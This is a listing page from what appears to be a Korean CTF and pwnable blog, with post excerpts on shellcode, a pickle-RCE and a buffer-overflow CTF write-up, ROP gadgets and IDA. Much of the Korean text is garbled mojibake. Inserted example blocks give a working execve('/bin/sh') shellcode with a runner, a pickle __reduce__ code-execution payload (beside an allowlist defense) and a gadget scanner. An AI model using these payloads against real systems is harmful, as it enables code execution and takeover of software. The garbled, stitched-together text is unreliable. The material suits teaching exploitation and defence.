
SYSTEM HACKING/PWNABLE

[PWN] Shellcode notes

๋ณธ ๊ธ€์€ Dreamhack System Hacking Curriculum - Shellcode๋ฅผ ์ฐธ๊ณ ํ•˜์—ฌ ์ž‘์„ฑ๋˜์—ˆ์Šต๋‹ˆ๋‹ค. 1. ๊ฐœ์š” ๊ธฐ๋ณธ์ ์œผ๋กœ ์‹œ์Šคํ…œ ํ•ดํ‚น์˜ ๋ชฉ์ ์€ ๋Œ€์ƒ ์‹œ์Šคํ…œ์„ '๋ถ€๋‹นํ•˜๊ฒŒ ์ด์šฉ'ํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. administrator์˜ ๊ถŒํ•œ์„ ๋นผ์•˜๋Š” ๊ฒƒ๋ถ€ํ„ฐ ์‹œ์ž‘ํ•ด์„œ ์ธ๊ฐ€๋˜์ง€ ์•Š์€ ํŒŒ์ผ์„ ์—ด์–ด๋ณด๋Š” ๊ฒƒ ๋“ฑ๋“ฑ๋„ ํ•ดํ‚น์˜ ๋ชฉ์ ์ด ๋  ์ˆ˜ ์žˆ๊ฒ ์ฃ . ์ด๋ฅผ ์œ„ํ•ด ์ œ์ž‘๋œ ์–ด์…ˆ๋ธ”๋ฆฌ์–ด ์ฝ”๋“œ๋ฅผ ์‰˜์ฝ”๋“œ(shellcode)๋ผ๊ณ  ํ•ฉ๋‹ˆ๋‹ค. ํ•ด๋‹น ์ฝ”๋“œ๋ฅผ ์‹คํ–‰์‹œํ‚ค๋ฉด ์‰˜(shell)์„ ์‹คํ–‰์‹œํ‚ฌ ์ˆ˜ ์žˆ๊ธฐ ๋•Œ๋ฌธ์ž…๋‹ˆ๋‹ค. ๊ตณ์ด C์–ธ์–ด์™€ ๊ฐ™์€ ๊ณ ๋“ฑ ์–ธ์–ด๊ฐ€ ์•„๋‹Œ ์–ด์…ˆ๋ธ”๋ฆฌ์–ด๋กœ ์ž‘์„ฑํ•˜๋Š” ์ด์œ ๋Š”, ์–ด์…ˆ๋ธ”๋ฆฌ์–ด ๋‹จ์œผ๋กœ ์ž‘์„ฑํ•  ๊ฒฝ์šฐ RIP๋ ˆ์ง€์Šคํ„ฐ๋งŒ ์กฐ์ •ํ•  ์ˆ˜ ์žˆ์–ด๋„ ๋ฐ”๋กœ ์›ํ•˜๋Š” ์ฝ”๋“œ๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๊ธฐ ๋•Œ๋ฌธ์ž…๋‹ˆ๋‹ค. ๋ฌผ๋ก  ์–ด์…ˆ๋ธ”๋ฆฌ์–ด๋กœ ์ž‘์„ฑ๋œ๋‹ค๋Š” ํŠน์„ฑ์ƒ ์•„ํ‚คํ…์ณ ..

Posted 2022.04.06
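As an added example (not part of the original post or the Dreamhack curriculum), the classic 27-byte x86-64 Linux execve("/bin/sh") shellcode, with two checks a practitioner wants before using any shellcode: that it contains no NUL or newline bytes (which would truncate it in a strcpy/gets-style sink), and that the string hidden in the movabs immediate really decodes to "/bin/sh". The neg trick is there precisely because loading "/bin/sh\0" directly puts a NUL inside the instruction; the NAIVE_MOVABS constant shows that. run() is Linux-only and is an assumption about the host (an RWX mapping via mmap/ctypes).

```python
import ctypes
import mmap

# x86-64 Linux execve("/bin/sh", ["/bin/sh"], NULL), 27 bytes, no NUL bytes.
# Constructed for this example; the instruction listing is in the comments.
SHELLCODE = bytes.fromhex(
    "31c0"                  # xor    eax, eax            ; rax = 0
    "48bbd19d9691d08c97ff"  # movabs rbx, 0xff978cd091969dd1 ; = -("/bin/sh\0" as LE u64)
    "48f7db"                # neg    rbx                 ; rbx = "/bin/sh\0"
    "53"                    # push   rbx                 ; string now lives on the stack
    "54"                    # push   rsp
    "5f"                    # pop    rdi                 ; rdi = &"/bin/sh"
    "99"                    # cdq                        ; rdx = 0 (envp = NULL)
    "52"                    # push   rdx                 ; argv[1] = NULL
    "57"                    # push   rdi                 ; argv[0] = &"/bin/sh"
    "54"                    # push   rsp
    "5e"                    # pop    rsi                 ; rsi = argv
    "b03b"                  # mov    al, 0x3b            ; SYS_execve
    "0f05"                  # syscall
)

# The obvious encoding, movabs rbx, "/bin/sh\0", carries the terminating NUL
# inside the instruction bytes, which is why the neg trick above is used.
NAIVE_MOVABS = bytes.fromhex("48bb2f62696e2f736800")


def bad_byte_offsets(sc: bytes, bad: bytes = b"\x00\x0a") -> list[int]:
    """Offsets of bytes that break delivery through C-string style sinks."""
    return [i for i, b in enumerate(sc) if b in bad]


def embedded_string(sc: bytes = SHELLCODE) -> bytes:
    """Recover the string hidden in the movabs immediate by undoing the neg."""
    imm = int.from_bytes(sc[4:12], "little")          # bytes 4..11 are the imm64
    return ((-imm) % (1 << 64)).to_bytes(8, "little")


def run(sc: bytes) -> None:
    """Copy the shellcode into an RWX mapping and jump to it (Linux only)."""
    buf = mmap.mmap(-1, len(sc), prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC)
    buf.write(sc)
    addr = ctypes.addressof(ctypes.c_char.from_buffer(buf))
    ctypes.CFUNCTYPE(None)(addr)()   # does not return on success: the process is now /bin/sh


if __name__ == "__main__":
    assert bad_byte_offsets(SHELLCODE) == []
    print(embedded_string())         # b'/bin/sh\x00'
    run(SHELLCODE)
```

The same bad_byte_offsets() check is what you run after any encoder or hand edit; a single stray 0x00 in the middle is the most common reason a "working" shellcode stops working once it is delivered through a real input path.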

[DawgCTF 2021] :pwn: Jellyspotters Write-Up ํฌ์ŠคํŒ… ์ธ๋„ค์ผ ์ด๋ฏธ์ง€

CTF

[DawgCTF 2021] :pwn: Jellyspotters Write-Up

Jellyspotters - 100pts Description Tag pwnable, pickle, python Problem Analysis It is a drawing program. Roughly that kind of program, and poking around it you can see it uses Pickle. Unpickling untrusted data is dangerous: it lets the sender run arbitrary code. Attaching a write-up: https://davidhamann.de/2020/04/05/exploiting-python-pickle/ Exploiting Python pickles How unpickling untrusted data can lead to remote code execution. davidhamann.de So let's use that to get RCE. Exploit The core of the pickle vulnerability is __reduce__..

Posted 2021.05.18
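As an added example (not the challenge's code or the write-up's own exploit), the __reduce__ mechanism the excerpt refers to, shown end to end: an object whose __reduce__ returns a callable and its arguments, which pickle.loads() invokes on the victim's side. The payload here calls eval on a harmless expression so the effect is observable (it returns the victim process's PID) rather than spawning a shell. Beside it is the standard mitigation, a pickle.Unpickler subclass whose find_class() refuses every global not on an allowlist; the allowlist contents are an assumption for the example.

```python
import io
import os
import pickle


class Exploit:
    """Any object whose __reduce__ returns (callable, args) makes the unpickler
    call that callable with those args. eval turns that into code execution."""

    def __reduce__(self):
        # Replace the expression with os.system("...") for a real attack.
        return (eval, ("__import__('os').getpid()",))


def build_payload() -> bytes:
    """What the attacker sends: pickle stores eval as a GLOBAL reference."""
    return pickle.dumps(Exploit())


def unsafe_loads(data: bytes):
    """What a vulnerable server does: trusts the sender's globals."""
    return pickle.loads(data)


def current_pid() -> int:
    return os.getpid()


class RestrictedUnpickler(pickle.Unpickler):
    """Allowlist-based unpickler: only these (module, name) globals may be resolved.
    The allowlist is an assumption for this example; tailor it to the real format."""

    ALLOWED = {("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def safe_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_blocked(data: bytes) -> bool:
    """True if the restricted unpickler rejects the payload."""
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


def benign_payload() -> bytes:
    """Constructed sample of the kind of state a drawing app might legitimately store."""
    return pickle.dumps({"strokes": [(0, 0), (10, 10)], "color": "red"})


if __name__ == "__main__":
    p = build_payload()
    print(unsafe_loads(p) == current_pid())   # True: the expression ran in this process
    print(is_blocked(p))                      # True
    print(safe_loads(benign_payload()))       # plain data still loads
```

Note that find_class() is the only hook you get: pickle opcodes other than GLOBAL/STACK_GLOBAL build plain containers and cannot call code, so the allowlist is the whole defense. If the format does not actually need any globals, an empty allowlist is the right setting, and for untrusted input the better answer is not to use pickle at all.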

[DawgCTF 2021] :pwn: Bofit Write-Up ํฌ์ŠคํŒ… ์ธ๋„ค์ผ ์ด๋ฏธ์ง€

CTF

[DawgCTF 2021] :pwn: Bofit Write-Up

Bofit - 125pts Description Tag pwnable, BOF Problem Analysis This was probably the easiest problem. Let's take a look. It seems to parody the BOP-IT toy. Looking at case 3, Shout it!, you can see that input is read with gets, which has no length bound at all. We go straight to a BOF with that: overflow the stack buffer and overwrite the return address. Nothing else to do, just do it.

Posted 2021.05.14

[ROP] gadget์ฐพ๋Š”๋ฒ• ํฌ์ŠคํŒ… ์ธ๋„ค์ผ ์ด๋ฏธ์ง€

SYSTEM HACKING/PWNABLE

[ROP] gadget์ฐพ๋Š”๋ฒ•

ROP(Return Oriented Programming)์—์„œ ๊ฐ€์žฅ ํ•ต์‹ฌ์ ์ธ ๋ถ€๋ถ„์„ ๊ณ ๋ฅด๋ผ๊ณ  ํ•˜๋ฉด gadget์„ ๊ตฌํ•˜๋Š” ๊ฒƒ์ผ ๊ฒƒ์ด๋‹ค. ์ด์—๋Š” ๋ช‡๊ฐ€์ง€ ๋ฐฉ๋ฒ•์ด ์žˆ๋‹ค. 1. ROPgadget ์ด์šฉํ•˜๊ธฐ ๋ช…๋ น์–ด๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์ด ์“ฐ๋ฉด ๋ฉ๋‹ˆ๋‹น. ROPgadget --binary (ํŒŒ์ผ๋ช…) | grep '(์ฐพ์„ ๊ฐ€์ ฏ)' ์ง . ๋‹ค์Œ๊ณผ ๊ฐ™์ด ์‚ฌ์šฉํ•˜๋ฉด ๋œ๋‹ค. ์œ„์˜ ๊ฒฝ์šฐ๋Š” 64๋น„ํŠธ์˜ ๊ฒฝ์šฐ๊ณ  32๋น„ํŠธ๋„ ๊ทธ๋ƒฅ ๋˜‘๊ฐ™๋‹ค. (์ฐธ๊ณ ๋กœ 64๋น„ํŠธ์—์„œ ์ธ์ž ๋ฐ›๋Š” ์ˆœ์„œ๋Š” rdi, rsi, rdx ์ˆœ์„œ๋ผ๊ณ  ํ•œ๋‹ค ์™ธ์šฐ์žฅ) ๊ทผ๋ฐ ์ €๊ธฐ ์„ธ ๋ฒˆ์งธ์˜ ๊ฒฝ์šฐ๋ฅผ ๋ณด๋ฉด ์•„๋ฌด๋Ÿฐ ๊ฒฐ๊ณผ๊ฐ€ ์—†๋‹ค. ๊ทธ๋Ÿผ ๊ฒฝ์šฐ๋Š” ๋‘๊ฐ€์ง€์ด๋‹ค. 1. ์ง„์งœ๋กœ pop rdx๊ฐ€ ์—†๋‹ค. 2. ROPgadget ์œผ๋กœ๋Š” ์กฐํšŒ๊ฐ€ ๋˜์ง€ ์•Š๋Š”๋‹ค. ๊ทผ๋ฐ ์ด๊ฒฝ์šฐ๋Š” ํ”„๋กœ๊ทธ๋žจ์— pop rdx๊ฐ€ ์—†์„๋ฆฌ๊ฐ€ ์—†๊ธฐ๋•Œ๋ฌธ์— ..

Posted 2019.10.11
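As an added example (not part of the original post, and not ROPgadget's own code), a minimal gadget scanner showing what tools like ROPgadget do under the hood: find every ret (0xc3), then try to decode the bytes before it, starting at every offset rather than only at instruction boundaries the compiler intended. That is how a "pop rdx ; ret" can exist even when the function-level disassembly never shows a pop rdx: the two bytes 5a c3 may sit inside another instruction's immediate. The scanner only understands pop reg (0x58-0x5f, optionally with the 0x41 REX prefix for r8-r15) and ret, which is enough for the pop-chain gadgets used for argument setup. The .text bytes are constructed for the example, and the 0x401000 base address is an assumption.

```python
# 64-bit register names for the one-byte pop opcodes 0x58..0x5f.
POP64 = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]
RET = 0xC3

# Constructed sample of a .text section (hex strings are concatenated).
TEXT = bytes.fromhex(
    "554889e5"      # push rbp ; mov rbp, rsp        (ordinary prologue)
    "ba5ac30000"    # mov edx, 0xc35a                (bytes 5a c3 hide "pop rdx ; ret")
    "5fc3"          # pop rdi ; ret
    "5e415fc3"      # pop rsi ; pop r15 ; ret        (the __libc_csu_init style pair)
    "c9c3"          # leave ; ret                    (no pops before it: not a gadget here)
)


def decode_pop(code: bytes, i: int):
    """Decode a pop at code[i]. Returns (register name, length) or None."""
    if i < len(code) and 0x58 <= code[i] <= 0x5F:
        return POP64[code[i] - 0x58], 1
    if i + 1 < len(code) and code[i] == 0x41 and 0x58 <= code[i + 1] <= 0x5F:
        return f"r{8 + code[i + 1] - 0x58}", 2      # REX.B selects r8..r15
    return None


def find_gadgets(code: bytes, base: int = 0, depth: int = 3) -> dict[int, str]:
    """Map address -> 'pop X ; pop Y ; ret' for every pop chain ending in a ret.

    Every byte offset before a ret is tried as a start, so gadgets that are not
    aligned with the compiler's instructions are found too."""
    gadgets: dict[int, str] = {}
    for j, b in enumerate(code):
        if b != RET:
            continue
        # A pop is at most 2 bytes, so depth pops fit in a 2*depth window.
        for start in range(max(0, j - 2 * depth), j):
            i, ins = start, []
            while i < j:
                d = decode_pop(code, i)
                if d is None:
                    break
                ins.append(f"pop {d[0]}")
                i += d[1]
            if i == j and ins:                      # decoded cleanly right up to the ret
                gadgets[base + start] = " ; ".join(ins + ["ret"])
    return gadgets


def grep_gadgets(gadgets: dict[int, str], needle: str) -> dict[int, str]:
    """The equivalent of piping the listing through grep."""
    return {addr: g for addr, g in gadgets.items() if needle in g}


if __name__ == "__main__":
    found = find_gadgets(TEXT, base=0x401000)
    for addr, g in sorted(found.items()):
        print(f"0x{addr:x} : {g}")
    print(grep_gadgets(found, "pop rdx"))     # {0x401005: 'pop rdx ; ret'}
```

Two practical notes: first, the gadget inside mov edx, 0xc35a only works because you jump to 0x401005 directly; the CPU does not care that the compiler never meant 0x5a to be an instruction. Second, this is exactly why a scanner tries every start offset and why a search that only looks at "real" instructions (or at a binary section the tool did not load) can come back empty for a gadget that is really there.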

[IDA] 01. ๋ณ€์ˆ˜์˜ ์ด๋ฆ„ ๋ฐ”๊พธ๊ธฐ ํฌ์ŠคํŒ… ์ธ๋„ค์ผ ์ด๋ฏธ์ง€

Tips

[IDA] 01. ๋ณ€์ˆ˜์˜ ์ด๋ฆ„ ๋ฐ”๊พธ๊ธฐ

[IDA] 01. ๋ณ€์ˆ˜ ์ด๋ฆ„ ๋ฐ”๊พธ๊ธฐ ๋„ˆ๋ฌด ๊ฐ„๋‹จํ•œ ๋‚ด์šฉ์ด์—ฌ์„œ ์–ผ๋ฅธ ๋๋‚ด์ฃ . ๋‹ค์Œ์€ ASIS CTF 4๊ฐ•์ „ ๋ฌธ์ œ ์ค‘ ํ•˜๋‚˜์ธ Cat์„ IDA๋กœ ๋Œ๋ฆฐ ๊ฒƒ์ž…๋‹ˆ๋‹ค. ๋ณด๋ฉด c์–ธ์–ด ํŒŒ์ผ๋กœ ์ž‘์„ฑ๋˜์–ด์žˆ์ง€๋งŒ, ์‚ฌ์šฉ์ž ์„ค์ • ๋ณ€์ˆ˜๋‚˜ ํ•จ์ˆ˜์˜ ์ด๋ฆ„๋“ค์€ sub_๋‚˜ ์šฐ๋ฆฌ๊ฐ€ ํ”ํžˆ ์ด์šฉํ•˜์ง€ ์•Š๋Š” ์ด๋ฆ„๋“ค๋กœ ๋˜์–ด์žˆ๋Š” ๊ฑธ ๋ณผ ์ˆ˜ ์žˆ์ฃ  ๋„ค ๋ฐ”๊พธ๊ณ  ์‹ถ์€ ๋ณ€์ˆ˜ ์œ„์— ๋งˆ์šฐ์Šค๋ฅผ ์˜ฌ๋ ค๋†“๊ณ  ์˜ค๋ฅธ์ชฝ ํด๋ฆญ ํ›„, ์ €๊ธฐ ์ฒซ๋ฒˆ์งธ Rename global item์„ ํด๋ฆญํ•˜๊ฑฐ๋‚˜ N์„ ๋ˆ„๋ฅด๋ฉด ์ด ์ฐฝ์ด ๋œจ๋Š”๋ฐ ์—ฌ๊ธฐ์„œ ๋ฐ”๊ฟ”์ฃผ์‹œ๋ฉด ๋ฉ๋‹ˆ๋‹ค. ์ฐธ๊ณ ๋กœ ์ด๋ฆ„์ง“๋Š” ๋ฐฉ๋ฒ•์€ C์–ธ์–ด์—์„œ ๋ณ€์ˆ˜์ด๋ฆ„์ง€์ • ๊ทœ์น™๊ณผ ๊ฐ™์Šต๋‹ˆ๋‹ค(๋นˆ์นธ์•ˆ๋˜๊ณ , ํŠน์ˆ˜๋ฌธ์ž ์•ˆ๋˜๊ณ  ๋“ฑ๋“ฑ..) ๋!

Posted 2019.08.10